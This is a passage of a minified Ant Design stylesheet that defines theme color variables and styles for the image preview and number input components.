declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-image { position: relative; display: inline-block; } .ant-image-img { display: block; width: 100%; height: auto; } .ant-image-img-placeholder { background-color: #f5f5f5; background-image: url('data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMTYiIGhlaWdodD0iMTYiIHZpZXdCb3g9IjAgMCAxNiAxNiIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48cGF0aCBkPSJNMTQuNSAyLjVoLTEzQS41LjUgMCAwIDAgMSAzdjEwYS41LjUgMCAwIDAgLjUuNWgxM2EuNS41IDAgMCAwIC41LS41VjNhLjUuNSAwIDAgMC0uNS0uNXpNNS4yODEgNC43NWExIDEgMCAwIDEgMCAyIDEgMSAwIDAgMSAwLTJ6bTguMDMgNi44M2EuMTI3LjEyNyAwIDAgMS0uMDgxLjAzSDIuNzY5YS4xMjUuMTI1IDAgMCAxLS4wOTYtLjIwN2wyLjY2MS0zLjE1NmEuMTI2LjEyNiAwIDAgMSAuMTc3LS4wMTZsLjAxNi4wMTZMNy4wOCAxMC4wOWwyLjQ3LTIuOTNhLjEyNi4xMjYgMCAwIDEgLjE3Ny0uMDE2bC4wMTUuMDE2IDMuNTg4IDQuMjQ0YS4xMjcuMTI3IDAgMCAxLS4wMi4xNzV6IiBmaWxsPSIjOEM4QzhDIiBmaWxsLXJ1bGU9Im5vbnplcm8iLz48L3N2Zz4='); background-repeat: no-repeat; background-position: center center; background-size: 30%; } .ant-image-mask { position: absolute; top: 0; right: 0; bottom: 0; left: 0; display: flex; align-items: center; justify-content: center; color: #fff; background: rgba(0, 0, 0, 0.5); cursor: pointer; opacity: 0; transition: opacity 0.3s; } .ant-image-mask-info { padding: 0 4px; overflow: hidden; white-space: nowrap; text-overflow: ellipsis; } .ant-image-mask-info .anticon { -webkit-margin-end: 4px; margin-inline-end: 4px; } .ant-image-mask:hover { opacity: 1; } .ant-image-placeholder { position: absolute; top: 0; right: 0; bottom: 0; left: 0; } .ant-image-preview { pointer-events: none; height: 100%; text-align: center; } .ant-image-preview.ant-zoom-enter, .ant-image-preview.antzoom-appear { transform: none; opacity: 0; -webkit-animation-duration: 0.3s; animation-duration: 0.3s; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-image-preview-mask { position: fixed; top: 0; right: 0; bottom: 0; left: 0; z-index: 1000; height: 100%; background-color: rgba(0, 0, 0, 0.45); } .ant-image-preview-mask-hidden { display: none; } .ant-image-preview-wrap { position: fixed; top: 0; right: 0; bottom: 0; left: 0; overflow: auto; outline: 0; -webkit-overflow-scrolling: touch; } .ant-image-preview-body { position: absolute; top: 0; right: 0; bottom: 0; left: 0; overflow: hidden; } .ant-image-preview-img { max-width: 100%; max-height: 100%; vertical-align: middle; transform: scale3d(1, 1, 1); cursor: -webkit-grab; cursor: grab; transition: transform 0.3s cubic-bezier(0.215, 0.61, 0.355, 1) 0s; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; pointer-events: auto; } .ant-image-preview-img-wrapper { position: absolute; top: 0; right: 0; bottom: 0; left: 0; transition: transform 0.3s cubic-bezier(0.215, 0.61, 0.355, 1) 0s; } .ant-image-preview-img-wrapper::before { display: inline-block; width: 1px; height: 50%; margin-right: -1px; content: ''; } .ant-image-preview-moving .ant-image-preview-img { cursor: -webkit-grabbing; cursor: grabbing; } .ant-image-preview-moving .ant-image-preview-img-wrapper { transition-duration: 0s; } .ant-image-preview-wrap { z-index: 1080; } .ant-image-preview-operations { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; font-feature-settings: 'tnum'; position: absolute; top: 0; right: 0; z-index: 1; display: flex; flex-direction: row-reverse; align-items: center; width: 100%; color: rgba(255, 255, 255, 0.85); list-style: none; background: rgba(0, 0, 0, 0.1); pointer-events: auto; } .ant-image-preview-operations-operation { margin-left: 12px; padding: 12px; cursor: pointer; } .ant-image-preview-operations-operation-disabled { color: rgba(255, 255, 255, 0.25); pointer-events: none; } .ant-image-preview-operations-operation:last-of-type { margin-left: 0; } .ant-image-preview-operations-icon { font-size: 18px; } .ant-image-preview-switch-left, .ant-image-preview-switch-right { position: absolute; top: 50%; right: 10px; z-index: 1; display: flex; align-items: center; justify-content: center; width: 44px; height: 44px; margin-top: -22px; color: rgba(255, 255, 255, 0.85); background: rgba(0, 0, 0, 0.1); border-radius: 50%; cursor: pointer; pointer-events: auto; } .ant-image-preview-switch-left-disabled, .ant-image-preview-switch-right-disabled { color: rgba(255, 255, 255, 0.25); cursor: not-allowed; } .ant-image-preview-switch-left-disabled > .anticon, .ant-image-preview-switch-right-disabled > .anticon { cursor: not-allowed; } .ant-image-preview-switch-left > .anticon, .ant-image-preview-switch-right > .anticon { font-size: 18px; } .ant-image-preview-switch-left { left: 10px; } .ant-image-preview-switch-right { right: 10px; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-input-number-affix-wrapper { position: relative; display: inline-block; width: 100%; min-width: 0; padding: 4px 11px; color: rgba(0, 0, 0, 0.85); font-size: 14px; line-height: 1.5715; background-color: #fff; background-image: none; border: 1px solid #d9d9d9; border-radius: 2px; transition: all 0.3s; /* stylelint-disable-next-line selector-no-vendor-prefix */ position: static; display: inline-flex; width: 90px; padding: 0; -webkit-padding-start: 11px; padding-inline-start: 11px; } .ant-input-number-affix-wrapper::-moz-placeholder { opacity: 1; } .ant-input-number-affix-wrapper:-ms-input-placeholder { color: #bfbfbf; -ms-user-select: none; user-select: none; } .ant-input-number-affix-wrapper::placeholder { color: #bfbfbf; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-input-number-affix-wrapper:-moz-placeholder-shown { text-overflow: ellipsis; } .ant-input-number-affix-wrapper:-ms-input-placeholder { text-overflow: ellipsis; } .ant-input-number-affix-wrapper:placeholder-shown { text-overflow: ellipsis; } .ant-input-number-affix-wrapper:hover { border-color: var(--ant-primary-5); border-right-width: 1px !important; } .ant-input-number-affix-wrapper:focus, .ant-input-number-affix-wrapper-focused { border-color: var(--ant-primary-color-hover); box-shadow: 0 0 0 2px var(--ant-primary-color-outline); border-right-width: 1px !important; outline: 0; } .ant-input-number-affix-wrapper-disabled { color: rgba(0, 0, 0, 0.25); background-color: #f5f5f5; border-color: #d9d9d9; box-shadow: none; cursor: not-allowed; opacity: 1; } .ant-input-number-affix-wrapper-disabled:hover { border-color: #d9d9d9; border-right-width: 1px !important; } .ant-input-number-affix-wrapper[disabled] { color: rgba(0, 0, 0, 0.25); background-color: #f5f5f5; border-color: #d9d9d9; box-shadow: none; cursor: not-allowed; opacity: 1; } .ant-input-number-affix-wrapper[disabled]:hover { border-color: #d9d9d9; border-right-width: 1px !important; } .ant-input-number-affix-wrapper-borderless, .ant-input-number-affix-wrapper-borderless:hover, .ant-input-number-affix-wrapper-borderless:focus, .ant-input-number-affix-wrapper-borderless-focused, .ant-input-number-affix-wrapper-borderless-disabled, .ant-input-number-affix-wrapper-borderless[disabled] { background-color: transparent; border: none; box-shadow: none; } textarea.ant-input-number-affix-wrapper { max-width: 100%; height: auto; min-height: 32px; line-height: 1.5715; vertical-align: bottom; transition: all 0.3s, height 0s; } .ant-input-number-affix-wrapper-lg { padding: 6.5px 11px; font-size: 16px; } .ant-input-number-affix-wrapper-sm { padding: 0px 7px; } .ant-input-number-affix-wrapper:not(.ant-input-number-affix-wrapper-disabled):hover { border-color: var(--ant-primary-5); border-right-width: 1px !important; z-index: 1; } .ant-input-number-affix-wrapper-focused, .ant-input-number-affix-wrapper:focus { z-index: 1; } .ant-input-number-affix-wrapper-disabled .ant-input-number[disabled] { background: transparent; } .ant-input-number-affix-wrapper > div.ant-input-number { width: 100%; border: none; outline: none; } .ant-input-number-affix-wrapper > div.ant-input-number.ant-input-number-focused { box-shadow: none !important; } .ant-input-number-affix-wrapper input.ant-input-number-input { padding: 0; } .ant-input-number-affix-wrapper::before { width: 0; visibility: hidden; content: '\a0'; } .ant-input-number-prefix { display: flex; flex: none; align-items: center; -webkit-margin-end: 4px; margin-inline-end: 4px; } .ant-input-number-group-wrapper .ant-input-number-affix-wrapper { width: 100%; } .ant-input-number { box-sizing: border-box; font-variant: tabular-nums; list-style: none; font-feature-settings: 'tnum'; position: relative; width: 100%; min-width: 0; padding: 4px 11px; color: rgba(0, 0, 0, 0.85); font-size: 14px; line-height: 1.5715; background-color: #fff; background-image: none; transition: all 0.3s; /* stylelint-disable-next-line selector-no-vendor-prefix */ display: inline-block; width: 90px; margin: 0; padding: 0; border: 1px solid #d9d9d9; border-radius: 2px; } .ant-input-number::-moz-placeholder { opacity: 1; } .ant-input-number:-ms-input-placeholder { color: #bfbfbf; -ms-user-select: none; user-select: none; } .ant-input-number::placeholder { color: #bfbfbf; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-input-number:-moz-placeholder-shown { text-overflow: ellipsis; } .ant-input-number:-ms-input-placeholder { text-overflow: ellipsis; } .ant-input-number:placeholder-shown { text-overflow: ellipsis; } .ant-input-number:hover { border-color: var(--ant-primary-5); border-right-width: 1px !important; } .ant-input-number:focus, .ant-input-number-focused { border-color: var(--ant-primary-color-hover); box-shadow: 0 0 0 2px var(--ant-primary-color-outline); border-right-width: 1px !important; outline: 0; } .ant-input-number-disabled { color: rgba(0, 0, 0, 0.25); background-color: #f5f5f5; border-color: #d9d9d9; box-shadow: none; cursor: not-allowed; opacity: 1; } .ant-input-number-disabled:hover { border-color: #d9d9d9; border-right-width: 1px !important; } .ant-input-number[disabled] { color: rgba(0, 0, 0, 0.25); background-color: #f5f5f5; border-color: #d9d9d9; box-shadow: none; cursor: not-allowed; opacity: 1; } .ant-input-number[disabled]:hover { border-color: #d9d9d9; border-right-width: 1px !important; } .ant-input-number-borderless, .ant-input-number-borderless:hover, .ant-input-number-borderless:focus, .ant-input-number-borderless-focused, .ant-input-number-borderless-disabled, .ant-input-number-borderless[disabled] { background-color: transparent; border: none; box-shadow: none; } textarea.ant-input-number { max-width: 100%; height: auto; min-height: 32px; line-height: 1.5715; vertical-align: bottom; transition: all 0.3s, height 0s; } .ant-input-number-lg { padding: 6.5px 11px; font-size: 16px; } .ant-input-number-sm { padding: 0px 7px; } .ant-input-number-group { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; display: table; width: 100%; border-collapse: separate; border-spacing: 0; } .ant-input-number-group[class*='col-'] { float: none; padding-right: 0; padding-left: 0; } .ant-input-number-group > [class*='col-'] { padding-right: 8px; } .ant-input-number-group > [class*='col-']:last-child { padding-right: 0; } .ant-input-number-group-addon, .ant-input-number-group-wrap, .ant-input-number-group > .ant-input-number { display: table-cell; } .ant-input-number-group-addon:not(:first-child):not(:last-child), .ant-input-number-group-wrap:not(:first-child):not(:last-child), .ant-input-number-group > .ant-input-number:not(:first-child):not(:last-child) { border-radius: 0; } .ant-input-number-group-addon, .ant-input-number-group-wrap { width: 1px; white-space: nowrap; vertical-align: middle; } .ant-input-number-group-wrap > * { display: block !important; } .ant-input-number-group .ant-input-number { float: left; width: 100%; margin-bottom: 0; text-align: inherit; } .ant-input-number-group .ant-input-number:focus { z-index: 1; border-right-width: 1px; } .ant-input-number-group .ant-input-number:hover { z-index: 1; border-right-width: 1px; } .ant-input-search-with-button .ant-input-number-group .ant-input-number:hover { z-index: 0; } .ant-input-number-group-addon { position: relative; padding: 0 11px; color: rgba(0, 0, 0, 0.85); font-weight: normal; font-size: 14px; text-align: center; background-color: #fafafa; border: 1px solid #d9d9d9; border-radius: 2px; transition: all 0.3s; } .ant-input-number-group-addon .ant-select { margin: -5px -11px; } .ant-input-number-group-addon .ant-select.ant-select-single:not(.ant-select-customize-input) .ant-select-selector { background-color: inherit; border: 1px solid transparent; box-shadow: none; } .ant-input-number-group-addon .ant-select-open .ant-select-selector, .ant-input-number-group-addon .ant-select-focused .ant-select-selector { color: var(--ant-primary-color); } .ant-input-number-group-addon .ant-cascader-picker { margin: -9px -12px; background-color: transparent; } .ant-input-number-group-addon .ant-cascader-picker .ant-cascader-input { text-align: left; border: 0; box-shadow: none; } .ant-input-number-group > .ant-input-number:first-child, .ant-input-number-group-addon:first-child { border-top-right-radius: 0; border-bottom-right-radius: 0; } .ant-input-number-group > .ant-input-number:first-child .ant-select .ant-select-selector, .ant-input-number-group-addon:first-child .ant-select .ant-select-selector { border-top-right-radius: 0; border-bottom-right-radius: 0; } .ant-input-number-group > .ant-input-number-affix-wrapper:not(:first-child) .ant-input-number { border-top-left-radius: 0; border-bottom-left-radius: 0; } .ant-input-number-group > .ant-input-number-affix-wrapper:not(:last-child) .ant-input-number { border-top-right-radius: 0; border-bottom-right-radius: 0; } .ant-input-number-group-addon:first-child { border-right: 0; } .ant-input-number-group-addon:last-child { border-left: 0; } .ant-input-number-group > .ant-input-number:last-child, .ant-input-number-group-addon:last-child { border-top-left-radius: 0; border-bottom-left-radius: 0; } .ant-input-number-group > .ant-input-number:last-child .ant-select .ant-select-selector, .ant-input-number-group-addon:last-child .ant-select .ant-select-selector { border-top-left-radius: 0; border-bottom-left-radius: 0; } .ant-input-number-group-lg .ant-input-number, .ant-input-number-group-lg > .ant-input-number-group-addon { padding: 6.5px 11px; font-size: 16px; } .ant-input-number-group-sm .ant-input-number, .ant-input-number-group-sm > .ant-input-number-group-addon { padding: 0px 7px; } .ant-input-number-group-lg .ant-select-single .ant-select-selector { height: 40px; } .ant-input-number-group-sm .ant-select-single .ant-select-selector { height: 24px; } .ant-input-number-group .ant-input-number-affix-wrapper:not(:last-child) { border-top-right-radius: 0; border-bottom-right-radius: 0; } .ant-input-search .ant-input-number-group .ant-input-number-affix-wrapper:not(:last-child) { border-top-left-radius: 2px; border-bottom-left-radius: 2px; } .ant-input-number-group .ant-input-number-affix-wrapper:not(:first-child), .ant-input-search .ant-input-number-group .ant-input-number-affix-wrapper:not(:first-child) { border-top-left-radius: 0; border-bottom-left-radius: 0; } .ant-input-number-group.ant-input-number-group-compact { display: block; } .ant-input-number-group.ant-input-number-group-compact::before { display: table; content: ''; } .ant-input-number-group.ant-input-number-group-compact::after { display: table; clear: both; content: ''; } .ant-input-number-group.ant-input-number-group-compact-addon:not(:first-child):not(:last-child), .ant-input-number-group.ant-input-number-group-compact-wrap:not(:first-child):not(:last-child), .ant-input-number-group.ant-input-number-group-compact > .ant-input-number:not(:first-child):not(:last-child) { border-right-width: 1px; } .ant-input-number-group.ant-input-number-group-compact-addon:not(:first-child):not(:last-child):hover, .ant-input-number-group.ant-input-number-group-compact-wrap:not(:first-child):not(:last-child):hover, .ant-input-number-group.ant-input-number-group-compact > .ant-input-number:not(:first-child):not(:last-child):hover { z-index: 1; } .ant-input-number-group.ant-input-number-group-compact-addon:not(:first-child):not(:last-child):focus, .ant-input-number-group.ant-input-number-group-compact-wrap:not(:first-child):not(:last-child):focus, .ant-input-number-group.ant-input-number-group-compact > .ant-input-number:not(:first-child):not(:last-child):focus { z-index: 1; } .ant-input-number-group.ant-input-number-group-compact > * { display: inline-block; float: none; vertical-align: top; border-radius: 0; } .ant-input-number-group.ant-input-number-group-compact > .ant-input-number-affix-wrapper { display: inline-flex; } .ant-input-number-group.ant-input-number-group-compact > .ant-picker-range { display: inline-flex; } .ant-input-number-group.ant-input-number-group-compact > *:not(:last-child) { margin-right: -1px; border-right-width: 1px; } .ant-input-number-group.ant-input-number-group-compact .ant-input-number { float: none; } .ant-input-number-group.ant-input-number-group-compact > .ant-select > .ant-select-selector, .ant-input-number-group.ant-input-number-group-compact > .ant-select-auto-complete .ant-input, .ant-input-number-group.ant-input-number-group-compact > .ant-cascader-picker .ant-input, .ant-input-number-group.ant-input-number-group-compact > .ant-input-group-wrapper .ant-input { border-right-width: 1px; border-radius: 0; } .ant-input-number-group.ant-input-number-group-compact > .ant-select > .ant-select-selector:hover, .ant-input-number-group.ant-input-number-group-compact > .ant-select-auto-complete .ant-input:hover, .ant-input-number-group.ant-input-number-group-compact > .ant-cascader-picker .ant-input:hover, .ant-input-number-group.ant-input-number-group-compact > .ant-input-group-wrapper .ant-input:hover { z-index: 1; } .ant-input-number-group.ant-input-number-group-compact > .ant-select > .ant-select-selector:focus, .ant-input-number-group.ant-input-number-group-compact > .ant-select-auto-complete .ant-input:focus, .ant-input-number-group.ant-input-number-group-compact > .ant-cascader-picker .ant-input:focus, .ant-input-number-group.ant-input-number-group-compact > .ant-input-group-wrapper .ant-input:focus { z-index: 1; } .ant-input-number-group.ant-input-number-group-compact > .ant-select-focused { z-index: 1; } .ant-input-number-group.ant-input-number-group-compact > .ant-select > .ant-select-arrow { z-index: 1; } .ant-input-number-group.ant-input-number-group-compact > *:first-child, .ant-input-number-group.ant-input-number-group-compact > .ant-select:first-child > .ant-select-selector, .ant-input-number-group.ant-input-number-group-compact > .ant-select-auto-complete:first-child .ant-input, .ant-input-number-group.ant-input-number-group-compact > .ant-cascader-picker:first-child .ant-input { border-top-left-radius: 2px; border-bottom-left-radius: 2px; } .ant-input-number-group.ant-input-number-group-compact > *:last-child, .ant-input-number-group.ant-input-number-group-compact > .ant-select:last-child > .ant-select-selector, .ant-input-number-group.ant-input-number-group-compact > .ant-cascader-picker:last-child .ant-input, .ant-input-number-group.ant-input-number-group-compact > .ant-cascader-picker-focused:last-child .ant-input { border-right-width: 1px; border-top-right-radius: 2px; border-bottom-right-radius: 2px; } .ant-input-number-group.ant-input-number-group-compact > .ant-select-auto-complete .ant-input { vertical-align: top; } .ant-input-number-group.ant-input-number-group-compact .ant-input-group-wrapper + .ant-input-group-wrapper { margin-left: -1px; } .ant-input-number-group.ant-input-number-group-compact .ant-input-group-wrapper + .ant-input-group-wrapper .ant-input-affix-wrapper { border-radius: 0; } .ant-input-number-group.ant-input-number-group-compact .ant-input-group-wrapper:not(:last-child).ant-input-search > .ant-input-group > .ant-input-group-addon > .ant-input-search-button { border-radius: 0; } .ant-input-number-group.ant-input-number-group-compact .ant-input-group-wrapper:not(:last-child).ant-input-search > .ant-input-group > .ant-input { border-radius: 2px 0 0 2px; } .ant-input-number-group-wrapper { display: inline-block; text-align: start; vertical-align: top; } .ant-input-number-handler { position: relative; display: block; width: 100%; height: 50%; overflow: hidden; color: rgba(0, 0, 0, 0.45); font-weight: bold; line-height: 0; text-align: center; border-left: 1px solid #d9d9d9; transition: all 0.1s linear; } .ant-input-number-handler:active { background: #f4f4f4; } .ant-input-number-handler:hover .ant-input-number-handler-up-inner, .ant-input-number-handler:hover .ant-input-number-handler-down-inner { color: var(--ant-primary-5); } .ant-input-number-handler-up-inner, .ant-input-number-handler-down-inner { display: inline-block; color: inherit; font-style: normal; line-height: 0; text-align: center; text-transform: none; vertical-align: -0.125em; text-rendering: optimizeLegibility; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; position: absolute; right: 4px; width: 12px; height: 12px; color: rgba(0, 0, 0, 0.45); line-height: 12px; transition: all 0.1s linear; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-input-number-handler-up-inner > *, .ant-input-number-handler-down-inner > * { line-height: 1; } .ant-input-number-handler-up-inner svg, .ant-input-number-handler-down-inner svg { display: inline-block; } .ant-input-number-handler-up-inner::before, .ant-input-number-handler-down-inner::before { display: none; } .ant-input-number-handler-up-inner .ant-input-number-handler-up-inner-icon, .ant-input-number-handler-up-inner .ant-input-number-handler-down-inner-icon, .ant-input-number-handler-down-inner .ant-input-number-handler-up-inner-icon, .ant-input-number-handler-down-inner .ant-input-number-handler-down-inner-icon { display: block; } .ant-input-number:hover { border-color: var(--ant-primary-5); border-right-width: 1px !important; } .ant-input-number:hover + .ant-form-item-children-icon { opacity: 0; transition: opacity 0.24s linear 0.24s; } .ant-input-number-focused { border-color: var(--ant-primary-color-hover); box-shadow: 0 0 0 2px var(--ant-primary-color-outline); border-right-width: 1px !important; outline: 0; } .ant-input-number-disabled { color: rgba(0, 0, 0, 0.25); background-color: #f5f5f5; border-color: #d9d9d9; box-shadow: none; cursor: not-allowed; opacity: 1; } .ant-input-number-disabled:hover { border-color: #d9d9d9; border-right-width: 1px !important; } .ant-input-number-disabled .ant-input-number-input { cursor: not-allowed; } .ant-input-number-disabled .ant-input-number-handler-wrap { display: none; } .ant-input-number-readonly .ant-input-number-handler-wrap { display: none; } .ant-input-number-input { width: 100%; height: 30px; padding: 0 11px; text-align: left; background-color: transparent; border: 0; border-radius: 2px; outline: 0; transition: all 0.3s linear; -webkit-appearance: textfield !important; -moz-appearance: textfield !important; appearance: textfield !important; /* stylelint-disable-next-line selector-no-vendor-prefix */ } .ant-input-number-input::-moz-placeholder { opacity: 1; } .ant-input-number-input:-ms-input-placeholder { color: #bfbfbf; -ms-user-select: none; user-select: none; } .ant-input-number-input::placeholder { color: #bfbfbf; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-input-number-input:-moz-placeholder-shown { text-overflow: ellipsis; } .ant-input-number-input:-ms-input-placeholder { text-overflow: ellipsis; } .ant-input-number-input:placeholder-shown { text-overflow: ellipsis; } .ant-input-number-input[type='number']::-webkit-inner-spin-button, .ant-input-number-input[type='number']::-webkit-outer-spin-button { margin: 0; /* stylelint-disable-next-line property-no-vendor-prefix */ -webkit-appearance: none; appearance: none; } .ant-input-number-lg { padding: 0; font-size: 16px; } .ant-input-number-lg input { height: 38px; } .ant-input-number-sm { padding: 0; } .ant-input-number-sm input { height: 22px; padding: 0 7px; } .ant-input-number-handler-wrap { position: absolute; top: 0; right: 0; width: 22px; height: 100%; background: #fff; border-radius: 0 2px 2px 0; opacity: 0; transition: opacity 0.24s linear 0.1s; } .ant-input-number-handler-wrap .ant-input-number-handler .ant-input-number-handler-up-inner, .ant-input-number-handler-wrap .ant-input-number-handler .ant-input-number-handler-down-inner { display: flex; align-items: center; justify-content: center; min-width: auto; margin-right: 0; font-size: 7px; } .ant-input-number-borderless .ant-input-number-handler-wrap { border-left-width: 0; } .ant-input-number-handler-wrap:hover .ant-input-number-handler { height: 40%; } .ant-input-number:hover .ant-input-number-handler-wrap, .ant-input-number-focused .ant-input-number-handler-wrap { opacity: 1; } .ant-input-number-handler-up { border-top-right-radius: 2px; cursor: pointer; } .ant-input-number-handler-up-inner { top: 50%; margin-top: -5px; text-align: center; } .ant-input-number-handler-up:hover { height: 60% !important; } .ant-input-number-handler-down { top: 0; border-top: 1px solid #d9d9d9; border-bottom-right-radius: 2px; cursor: pointer; } .ant-input-number-handler-down-inner { top: 50%; text-align: center; transform: translateY(-50%); } .ant-input-number-handler-down:hover { height: 60% !important; } .ant-input-number-borderless .ant-input-number-handler-down { border-top-width: 0; } .ant-input-number-handler-up-disabled, .ant-input-number-handler-down-disabled { cursor: not-allowed; } .ant-input-number-handler-up-disabled:hover .ant-input-number-handler-up-inner, .ant-input-number-handler-down-disabled:hover .ant-input-number-handler-down-inner { color: rgba(0, 0, 0, 0.25); } .ant-input-number-borderless { box-shadow: none; } .ant-input-number-out-of-range input { color: var(--ant-error-color); } .ant-input-number-rtl { direction: rtl; } .ant-input-number-rtl .ant-input-number-handler { border-right: 1px solid #d9d9d9; border-left: 0; } .ant-input-number-rtl .ant-input-number-handler-wrap { right: auto; left: 0; } .ant-input-number-rtl.ant-input-number-borderless .ant-input-number-handler-wrap { border-right-width: 0; } .ant-input-number-rtl .ant-input-number-handler-up { border-top-right-radius: 0; } .ant-input-number-rtl .ant-input-number-handler-down { border-bottom-right-radius: 0; } .ant-input-number-rtl .ant-input-number-input { direction: ltr; text-align: right; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; 